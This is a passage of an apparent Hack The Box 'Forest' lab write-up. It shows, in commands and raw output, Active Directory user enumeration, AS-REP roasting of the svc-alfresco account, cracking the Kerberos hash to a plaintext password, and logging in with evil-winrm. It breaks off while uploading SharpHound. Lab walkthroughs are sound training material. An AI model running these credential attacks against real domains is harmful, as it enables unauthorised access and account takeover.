class="s1">'1130'</span>: username: SM_7c96b981967141ebb name: E4E Encryption Store - Active acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1131'</span>: username: SM_c75ee099d0a64c91b name: Microsoft Exchange acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1132'</span>: username: SM_1ffab36a2f5f479cb name: SystemMailbox<span class="o">{</span>8cc370d3-822a-4ab8-a926-bb94bd0641a9<span class="o">}</span> acb: <span class="s1">'0x00020011'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1134'</span>: username: HealthMailboxc3d7722 name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1135'</span>: username: HealthMailboxfc9daad name: HealthMailbox-EXCH01-001 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1136'</span>: username: HealthMailboxc0a90c9 name: HealthMailbox-EXCH01-002 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1137'</span>: username: HealthMailbox670628e name: HealthMailbox-EXCH01-003 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1138'</span>: username: HealthMailbox968e74d name: HealthMailbox-EXCH01-004 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1139'</span>: username: HealthMailbox6ded678 name: HealthMailbox-EXCH01-005 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1140'</span>: username: HealthMailbox83d6781 name: HealthMailbox-EXCH01-006 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1141'</span>: username: HealthMailboxfd87238 name: HealthMailbox-EXCH01-007 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1142'</span>: username: HealthMailboxb01ac64 name: HealthMailbox-EXCH01-008 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1143'</span>: username: HealthMailbox7108a4e name: HealthMailbox-EXCH01-009 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1144'</span>: username: HealthMailbox0659cc1 name: HealthMailbox-EXCH01-010 acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1145'</span>: username: sebastien name: Sebastien Caron acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1146'</span>: username: lucinda name: Lucinda Berger acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1147'</span>: username: svc-alfresco name: svc-alfresco acb: <span class="s1">'0x00010210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1150'</span>: username: andy name: Andy Hislip acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1151'</span>: username: mark name: Mark Brandt acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'1152'</span>: username: santi name: Santi Rodriguez acb: <span class="s1">'0x00000210'</span> description: <span class="o">(</span>null<span class="o">)</span> <span class="s1">'500'</span>: username: Administrator name: Administrator acb: <span class="s1">'0x00000010'</span> description: Built-in account <span class="k">for </span>administering the computer/domain <span class="s1">'501'</span>: username: Guest name: <span class="o">(</span>null<span class="o">)</span> acb: <span class="s1">'0x00000215'</span> description: Built-in account <span class="k">for </span>guest access to the computer/domain <span class="s1">'502'</span>: username: krbtgt name: <span class="o">(</span>null<span class="o">)</span> acb: <span class="s1">'0x00000011'</span> description: Key Distribution Center Service Account <span class="s1">'503'</span>: username: DefaultAccount name: <span class="o">(</span>null<span class="o">)</span> acb: <span class="s1">'0x00000215'</span> description: A user account managed by the system. <span class="o">======================================</span> | Groups via RPC on 10.129.29.48 | <span class="o">======================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">local groups</span> <span class="o">[</span>+] Found 5 group<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumalsgroups domain'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating <span class="nb">builtin groups</span> <span class="o">[</span>+] Found 29 group<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumalsgroups builtin'</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating domain <span class="nb">groups</span> <span class="o">[</span>+] Found 38 group<span class="o">(</span>s<span class="o">)</span> via <span class="s1">'enumdomgroups'</span> <span class="o">[</span>+] After merging <span class="nb">groups </span>results we have 72 group<span class="o">(</span>s<span class="o">)</span> total: <span class="s1">'1101'</span>: groupname: DnsAdmins <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'1102'</span>: groupname: DnsUpdateProxy <span class="nb">type</span>: domain <span class="s1">'1104'</span>: groupname: Organization Management <span class="nb">type</span>: domain <span class="s1">'1105'</span>: groupname: Recipient Management <span class="nb">type</span>: domain <span class="s1">'1106'</span>: groupname: View-Only Organization Management <span class="nb">type</span>: domain <span class="s1">'1107'</span>: groupname: Public Folder Management <span class="nb">type</span>: domain <span class="s1">'1108'</span>: groupname: UM Management <span class="nb">type</span>: domain <span class="s1">'1109'</span>: groupname: Help Desk <span class="nb">type</span>: domain <span class="s1">'1110'</span>: groupname: Records Management <span class="nb">type</span>: domain <span class="s1">'1111'</span>: groupname: Discovery Management <span class="nb">type</span>: domain <span class="s1">'1112'</span>: groupname: Server Management <span class="nb">type</span>: domain <span class="s1">'1113'</span>: groupname: Delegated Setup <span class="nb">type</span>: domain <span class="s1">'1114'</span>: groupname: Hygiene Management <span class="nb">type</span>: domain <span class="s1">'1115'</span>: groupname: Compliance Management <span class="nb">type</span>: domain <span class="s1">'1116'</span>: groupname: Security Reader <span class="nb">type</span>: domain <span class="s1">'1117'</span>: groupname: Security Administrator <span class="nb">type</span>: domain <span class="s1">'1118'</span>: groupname: Exchange Servers <span class="nb">type</span>: domain <span class="s1">'1119'</span>: groupname: Exchange Trusted Subsystem <span class="nb">type</span>: domain <span class="s1">'1120'</span>: groupname: Managed Availability Servers <span class="nb">type</span>: domain <span class="s1">'1121'</span>: groupname: Exchange Windows Permissions <span class="nb">type</span>: domain <span class="s1">'1122'</span>: groupname: ExchangeLegacyInterop <span class="nb">type</span>: domain <span class="s1">'1133'</span>: groupname: <span class="nv">$D31000</span><span class="nt">-NSEL5BRJ63V7</span> <span class="nb">type</span>: domain <span class="s1">'1148'</span>: groupname: Service Accounts <span class="nb">type</span>: domain <span class="s1">'1149'</span>: groupname: Privileged IT Accounts <span class="nb">type</span>: domain <span class="s1">'498'</span>: groupname: Enterprise Read-only Domain Controllers <span class="nb">type</span>: domain <span class="s1">'5101'</span>: groupname: <span class="nb">test type</span>: domain <span class="s1">'512'</span>: groupname: Domain Admins <span class="nb">type</span>: domain <span class="s1">'513'</span>: groupname: Domain Users <span class="nb">type</span>: domain <span class="s1">'514'</span>: groupname: Domain Guests <span class="nb">type</span>: domain <span class="s1">'515'</span>: groupname: Domain Computers <span class="nb">type</span>: domain <span class="s1">'516'</span>: groupname: Domain Controllers <span class="nb">type</span>: domain <span class="s1">'517'</span>: groupname: Cert Publishers <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'518'</span>: groupname: Schema Admins <span class="nb">type</span>: domain <span class="s1">'519'</span>: groupname: Enterprise Admins <span class="nb">type</span>: domain <span class="s1">'520'</span>: groupname: Group Policy Creator Owners <span class="nb">type</span>: domain <span class="s1">'521'</span>: groupname: Read-only Domain Controllers <span class="nb">type</span>: domain <span class="s1">'522'</span>: groupname: Cloneable Domain Controllers <span class="nb">type</span>: domain <span class="s1">'525'</span>: groupname: Protected Users <span class="nb">type</span>: domain <span class="s1">'526'</span>: groupname: Key Admins <span class="nb">type</span>: domain <span class="s1">'527'</span>: groupname: Enterprise Key Admins <span class="nb">type</span>: domain <span class="s1">'544'</span>: groupname: Administrators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'545'</span>: groupname: Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'546'</span>: groupname: Guests <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'548'</span>: groupname: Account Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'549'</span>: groupname: Server Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'550'</span>: groupname: Print Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'551'</span>: groupname: Backup Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'552'</span>: groupname: Replicator <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'553'</span>: groupname: RAS and IAS Servers <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'554'</span>: groupname: Pre-Windows 2000 Compatible Access <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'555'</span>: groupname: Remote Desktop Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'556'</span>: groupname: Network Configuration Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'557'</span>: groupname: Incoming Forest Trust Builders <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'558'</span>: groupname: Performance Monitor Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'559'</span>: groupname: Performance Log Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'560'</span>: groupname: Windows Authorization Access Group <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'561'</span>: groupname: Terminal Server License Servers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'562'</span>: groupname: Distributed COM Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'568'</span>: groupname: IIS_IUSRS <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'569'</span>: groupname: Cryptographic Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'571'</span>: groupname: Allowed RODC Password Replication Group <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'572'</span>: groupname: Denied RODC Password Replication Group <span class="nb">type</span>: <span class="nb">local</span> <span class="s1">'573'</span>: groupname: Event Log Readers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'574'</span>: groupname: Certificate Service DCOM Access <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'575'</span>: groupname: RDS Remote Access Servers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'576'</span>: groupname: RDS Endpoint Servers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'577'</span>: groupname: RDS Management Servers <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'578'</span>: groupname: Hyper-V Administrators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'579'</span>: groupname: Access Control Assistance Operators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'580'</span>: groupname: Remote Management Users <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'581'</span>: groupname: System Managed Accounts Group <span class="nb">type</span>: <span class="nb">builtin</span> <span class="s1">'582'</span>: groupname: Storage Replica Administrators <span class="nb">type</span>: <span class="nb">builtin</span> <span class="o">======================================</span> | Shares via RPC on 10.129.29.48 | <span class="o">======================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Enumerating shares <span class="o">[</span>+] Found 0 share<span class="o">(</span>s<span class="o">)</span> <span class="k">for </span>user <span class="s1">''</span> with password <span class="s1">''</span>, try a different user <span class="o">=========================================</span> | Policies via RPC <span class="k">for </span>10.129.29.48 | <span class="o">=========================================</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Trying port 445/tcp <span class="o">[</span>+] Found policy: Domain password information: Password <span class="nb">history </span>length: 24 Minimum password length: 7 Maximum password age: not <span class="nb">set </span>Password properties: - DOMAIN_PASSWORD_COMPLEX: <span class="nb">false</span> - DOMAIN_PASSWORD_NO_ANON_CHANGE: <span class="nb">false</span> - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: <span class="nb">false</span> - DOMAIN_PASSWORD_LOCKOUT_ADMINS: <span class="nb">false</span> - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: <span class="nb">false</span> - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: <span class="nb">false </span>Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None Domain logoff information: Force logoff <span class="nb">time</span>: not <span class="nb">set</span> <span class="o">=========================================</span> | Printers via RPC <span class="k">for </span>10.129.29.48 | <span class="o">=========================================</span> <span class="o">[</span>-] Could not get printer info via <span class="s1">'enumprinters'</span>: STATUS_ACCESS_DENIED Completed after 7.12 seconds </code></pre> </div> <p>Now I have list os users and I need to format the usernames in a readable format, so I came up with the onliner below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="s2">"username:"</span> users.txt | <span class="nb">awk</span> <span class="s1">'{gsub(/^\$/, "", $2); print $2}'</span> <span class="o">&gt;</span> usernames.txt </code></pre> </div> <p>Now with the list of domain users ready, let's check it with kerbrute to be sure we have valid users.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>./kerbrute_linux_amd64 userenum <span class="nt">-d</span> htb.local usernames.txt <span class="nt">--dc</span> 10.129.29.48 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\</span> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|<span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ Version: v1.0.3 <span class="o">(</span>9dad6e1<span class="o">)</span> - 05/05/26 - Ronnie Flathers @ropnop 2026/05/05 11:06:48 <span class="o">&gt;</span> Using KDC<span class="o">(</span>s<span class="o">)</span>: 2026/05/05 11:06:48 <span class="o">&gt;</span> 10.129.29.48:88 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailboxc3d7722@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailboxfc9daad@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailbox968e74d@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailbox670628e@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailboxfd87238@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailboxb01ac64@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailboxc0a90c9@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: sebastien@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailbox7108a4e@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailbox0659cc1@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: svc-alfresco@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: lucinda@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailbox6ded678@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: santi@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: mark@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: andy@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: HealthMailbox83d6781@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> <span class="o">[</span>+] VALID USERNAME: Administrator@htb.local 2026/05/05 11:06:48 <span class="o">&gt;</span> Done! Tested 31 usernames <span class="o">(</span>18 valid<span class="o">)</span> <span class="k">in </span>0.045 seconds </code></pre> </div> <p><br> bash<br> We got back 18 valid domain users from our list of 31 users, Now let's check AS-REP Roasting for all the valid usernames to see if there would any of the user with <code>DONT_REQ_PREAUTH</code> enabled, if we found any of the user with this enabled, we would get back the user's hash and we can take off-line and crack it.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ [★]$ GetNPUsers.py 'htb.local/' -usersfile valid_username.txt -format hashcat -outputfile forestbox.aspreroast -dc-ip 10.129.29.48 Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies [-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d475b6d5bbec387512d$b816a045addd996ab16093ef48579ccd1439f796148d0a903d0934b93ad5e94c2ce3c35156137d253c4eef31999e57dcaba0060fd910d7b693c51c768b80c02c4324f11b1e2350b7e2ad2b65e918f7e80e9de116d9a7f2bef847492c0bf11857412ee446a258040373634b67651a4ee8243e2db2380a4dad3d49c9eb13a58b0d7598674726803e4d8ffbd51151b67bf7161441445c0a0a4bbed4ba2c3732ea4f36b79d98d0b4e3a1c707ac21d3f87b38c67e4b1099b672274ec89dca4302650ff49911f2d9b23937722b195a3973b4dd48a557587b099cf0b966cfe27452ceab74f9882eaf89 [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] invalid principal syntax </code></pre> </div> <p>Great!!! We got back <code>svc-alfresco</code> hash. Let's take the hash off-line and see if we can crack the hash with hashcat.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>hashcat <span class="nt">-m</span> 18200 forestbox.aspreroast /usr/share/wordlists/rockyou.txt <span class="nt">--force</span> hashcat <span class="o">(</span>v6.2.6<span class="o">)</span> starting You have enabled <span class="nt">--force</span> to bypass dangerous warnings and errors! This can hide serious problems and should only be <span class="k">done </span>when debugging. Do not report hashcat issues encountered when using <span class="nt">--force</span><span class="nb">.</span> OpenCL API <span class="o">(</span>OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG<span class="o">)</span> - Platform <span class="c">#1 [The pocl project]</span> <span class="o">==================================================================================================================================================</span> <span class="k">*</span> Device <span class="c">#1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped</span> OpenCL API <span class="o">(</span>OpenCL 2.1 LINUX<span class="o">)</span> - Platform <span class="c">#2 [Intel(R) Corporation]</span> <span class="o">==================================================================</span> <span class="k">*</span> Device <span class="c">#2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU</span> Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests<span class="p">;</span> 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: <span class="k">*</span> Zero-Byte <span class="k">*</span> Not-Iterated <span class="k">*</span> Single-Hash <span class="k">*</span> Single-Salt ATTENTION! Pure <span class="o">(</span>unoptimized<span class="o">)</span> backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append <span class="nt">-O</span> to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required <span class="k">for </span>this attack: 1 MB Dictionary cache built: <span class="k">*</span> Filename..: /usr/share/wordlists/rockyou.txt <span class="k">*</span> Passwords.: 14344392 <span class="k">*</span> Bytes.....: 139921507 <span class="k">*</span> Keyspace..: 14344385 <span class="k">*</span> Runtime...: 1 sec <span class="nv">$krb5asrep$23$svc</span><span class="nt">-alfresco</span>@HTB.LOCAL:e1f287c1c6364d475b6d5bbec387512d<span class="nv">$b816a045addd996ab16093ef48579ccd1439f796148d0a903d0934b93ad5e94c2ce3c35156137d253c4eef31999e57dcaba0060fd910d7b693c51c768b80c02c4324f11b1e2350b7e2ad2b65e918f7e80e9de116d9a7f2bef847492c0bf11857412ee446a258040373634b67651a4ee8243e2db2380a4dad3d49c9eb13a58b0d7598674726803e4d8ffbd51151b67bf7161441445c0a0a4bbed4ba2c3732ea4f36b79d98d0b4e3a1c707ac21d3f87b38c67e4b1099b672274ec89dca4302650ff49911f2d9b23937722b195a3973b4dd48a557587b099cf0b966cfe27452ceab74f9882eaf89</span>:s3rvice Session..........: hashcat Status...........: Cracked Hash.Mode........: 18200 <span class="o">(</span>Kerberos 5, etype 23, AS-REP<span class="o">)</span> Hash.Target......: <span class="nv">$krb5asrep$23$svc</span><span class="nt">-alfresco</span>@HTB.LOCAL:e1f287c1c6364d...2eaf89 Time.Started.....: Tue May 5 11:16:34 2026, <span class="o">(</span>2 secs<span class="o">)</span> Time.Estimated...: Tue May 5 11:16:36 2026, <span class="o">(</span>0 secs<span class="o">)</span> Kernel.Feature...: Pure Kernel Guess.Base.......: File <span class="o">(</span>/usr/share/wordlists/rockyou.txt<span class="o">)</span> Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Speed.#2.........: 1896.9 kH/s <span class="o">(</span>0.80ms<span class="o">)</span> @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>total<span class="o">)</span>, 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>new<span class="o">)</span> Progress.........: 4085760/14344385 <span class="o">(</span>28.48%<span class="o">)</span> Rejected.........: 0/4085760 <span class="o">(</span>0.00%<span class="o">)</span> Restore.Point....: 4083712/14344385 <span class="o">(</span>28.47%<span class="o">)</span> Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#2....: s523480 -&gt; s3r3ndipit Started: Tue May 5 11:16:25 2026 Stopped: Tue May 5 11:16:37 2026 </code></pre> </div> <p>We are able to crack the hash, now we have our innitial credentials <code>svc-alfresco:s3rvice</code>, let's try to get on the host with <code>evil-winrm</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>evil-winrm <span class="nt">-i</span> 10.129.29.48 <span class="nt">-u</span> svc-alfresco <span class="nt">-p</span> s3rvice Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function </span>is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc-alfresco<span class="se">\D</span>ocuments&gt; <span class="nb">dir</span> </code></pre> </div> <p>I was able to lunch <code>evil-winrm</code> successfully with the credentials.</p> <h2> User and Domain Enumeration from Domain joined host </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers&gt; net <span class="nb">users </span>User accounts <span class="k">for</span> <span class="se">\\</span> <span class="nt">-------------------------------------------------------------------------------</span> <span class="nv">$331000</span><span class="nt">-VK4ADACQNUCA</span> Administrator andy DefaultAccount Guest HealthMailbox0659cc1 HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64 HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad HealthMailboxfd87238 krbtgt lucinda mark santi sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b svc-alfresco The <span class="nb">command </span>completed with one or more errors. <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers&gt; <span class="nb">whoami</span> /priv PRIVILEGES INFORMATION <span class="nt">----------------------</span> Privilege Name Description State <span class="o">=============================</span> <span class="o">==============================</span> <span class="o">=======</span> SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set </span>Enabled <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers&gt; reg.exe query <span class="s2">"HKLM</span><span class="se">\s</span><span class="s2">oftware</span><span class="se">\m</span><span class="s2">icrosoft</span><span class="se">\w</span><span class="s2">indows nt</span><span class="se">\c</span><span class="s2">urrentversion</span><span class="se">\w</span><span class="s2">inlogon"</span> HKEY_LOCAL_MACHINE<span class="se">\s</span>oftware<span class="se">\m</span>icrosoft<span class="se">\w</span>indows nt<span class="se">\c</span>urrentversion<span class="se">\w</span>inlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no DisableBackButton REG_DWORD 0x1 ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 PreCreateKnownFolders REG_SZ <span class="o">{</span>A520A1A4-1780-4FF6-BD18-167343C5AF16<span class="o">}</span> ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe ShellCritical REG_DWORD 0x0 ShellInfrastructure REG_SZ sihost.exe SiHostCritical REG_DWORD 0x0 SiHostReadyTimeOut REG_DWORD 0x0 SiHostRestartCountLimit REG_DWORD 0x0 SiHostRestartTimeGap REG_DWORD 0x0 Userinit REG_SZ C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\u</span>serinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile WinStationsDisabled REG_SZ 0 scremoveoption REG_SZ 0 DisableCAD REG_DWORD 0x1 LastLogOffEndTimePerfCounter REG_QWORD 0x5ea4c0cd ShutdownFlags REG_DWORD 0x80000033 DisableLockWorkstation REG_DWORD 0x0 DefaultDomainName REG_SZ HTB HKEY_LOCAL_MACHINE<span class="se">\s</span>oftware<span class="se">\m</span>icrosoft<span class="se">\w</span>indows nt<span class="se">\c</span>urrentversion<span class="se">\w</span>inlogon<span class="se">\A</span>lternateShells HKEY_LOCAL_MACHINE<span class="se">\s</span>oftware<span class="se">\m</span>icrosoft<span class="se">\w</span>indows nt<span class="se">\c</span>urrentversion<span class="se">\w</span>inlogon<span class="se">\G</span>PExtensions HKEY_LOCAL_MACHINE<span class="se">\s</span>oftware<span class="se">\m</span>icrosoft<span class="se">\w</span>indows nt<span class="se">\c</span>urrentversion<span class="se">\w</span>inlogon<span class="se">\A</span>utoLogonChecked HKEY_LOCAL_MACHINE<span class="se">\s</span>oftware<span class="se">\m</span>icrosoft<span class="se">\w</span>indows nt<span class="se">\c</span>urrentversion<span class="se">\w</span>inlogon<span class="se">\V</span>olatileUserMgrKey <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers&gt; </code></pre> </div> <p>To better visualize the Domain, let's use bloodhound for the domain enumeration, this would help see the path, relation in a graphical view.</p> <p>To use bloodhound, you need collectors, so I uplod sharphound as the collector, to collect domain info, since <code>evil-winrm</code> has <code>upload</code> and 